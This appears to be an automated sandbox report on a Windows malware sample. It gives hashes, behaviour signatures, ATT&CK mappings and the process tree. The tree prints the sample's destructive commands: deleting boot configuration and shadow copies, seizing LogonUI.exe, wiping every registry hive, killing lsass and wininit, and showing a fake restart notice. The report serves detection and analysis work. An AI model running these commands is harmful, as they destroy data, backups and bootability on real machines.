Analysis

  • max time kernel
    14s
  • max time network
    75s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    18-04-2021 01:08

Errors

Reason
Machine shutdown

General

  • Target

    1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813.exe

  • Size

    86KB

  • MD5

    226213909fea9a07e66f734dedfb2d1d

  • SHA1

    218d7e3178a60ad08abebc68bb462773a6f80b38

  • SHA256

    1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813

  • SHA512

    ecb0c2a7fc5ee54168dedd4f67a626ce3fea7ec977b65bb59fed36b48f1d2c20407228ad96e14969c58976e6a98ffd33399ea6f0b15ed6ba5568ce26abbfdce3

Malware Config

Signatures

  • Modifies system executable filetype association 2 TTPs 49 IoCs
  • Registers COM server for autorun 1 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies Installed Components in the registry 2 TTPs
  • Possible privilege escalation attempt 2 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Modifies boot configuration data using bcdedit 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813.exe
    "C:\Users\Admin\AppData\Local\Temp\1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4660
    • C:\Windows\System32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6632.tmp\6633.tmp\6634.bat C:\Users\Admin\AppData\Local\Temp\1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3592
      • C:\Windows\System32\bcdedit.exe
        bcdedit /delete {current}
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:4252
      • C:\Windows\System32\vssadmin.exe
        vssadmin delete shadows /for=c: /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:4276
      • C:\Windows\System32\takeown.exe
        takeown /f LogonUI.exe
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:4176
      • C:\Windows\System32\icacls.exe
        icacls LogonUI.exe /grant Admin:f
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:4116
      • C:\Windows\System32\reg.exe
        reg delete HKCU /f
        3⤵
        • Modifies system executable filetype association
        • Adds Run key to start application
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Modifies registry key
        PID:3344
      • C:\Windows\System32\reg.exe
        reg delete HKU /f
        3⤵
        • Adds Run key to start application
        • Modifies data under HKEY_USERS
        PID:904
      • C:\Windows\System32\reg.exe
        reg delete HKCC /f
        3⤵
          PID:1080
        • C:\Windows\System32\reg.exe
          reg delete HKCR /f
          3⤵
          • Modifies system executable filetype association
          • Modifies registry class
          PID:1108
        • C:\Windows\System32\taskkill.exe
          taskkill /im lsass.exe /f /t
          3⤵
          • Kills process with taskkill
          PID:1692
        • C:\Windows\System32\reg.exe
          reg delete HKLM /f
          3⤵
          • Modifies registry key
          PID:2340
        • C:\Windows\System32\taskkill.exe
          taskkill /im wininit.exe /f /t
          3⤵
          • Kills process with taskkill
          PID:3632
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3856
    • C:\Windows\system32\wlrmdr.exe
      -s -1 -f 2 -t Your PC will automatically restart in one minute -m Windows ran into a problem and needs to restart. You should close this message now and save your work. -a 3
      1⤵
        PID:2472

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Persistence

      Change Default File Association

      1
      T1042

      Registry Run Keys / Startup Folder

      3
      T1060

      Defense Evasion

      Modify Registry

      5
      T1112

      File Deletion

      2
      T1107

      File Permissions Modification

      1
      T1222

      Discovery

      System Information Discovery

      1
      T1082

      Impact

      Inhibit System Recovery

      2
      T1490

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\6632.tmp\6633.tmp\6634.bat
        MD5

        38dc7703a0a8fddc5870776a3b4e662c

        SHA1

        4fd989609b186842874ce1dba6b32ab71bc77881

        SHA256

        5636818caa00d72d10df36a8b37cd355d74855c5cf891aeaf468c19d1f08176c

        SHA512

        dd89c0adcaa1b5122eddda514d9cebe3cc100f2aed13192ba1e58ffb1848bed5c46c6b9d2762e3d1a0da01d5f099cada05a99167f675768f6573b8ef983f5291

      • memory/904-121-0x0000000000000000-mapping.dmp
      • memory/1080-122-0x0000000000000000-mapping.dmp
      • memory/1108-123-0x0000000000000000-mapping.dmp
      • memory/1692-124-0x0000000000000000-mapping.dmp
      • memory/2340-125-0x0000000000000000-mapping.dmp
      • memory/3344-120-0x0000000000000000-mapping.dmp
      • memory/3592-114-0x0000000000000000-mapping.dmp
      • memory/4116-119-0x0000000000000000-mapping.dmp
      • memory/4176-118-0x0000000000000000-mapping.dmp
      • memory/4252-116-0x0000000000000000-mapping.dmp
      • memory/4276-117-0x0000000000000000-mapping.dmp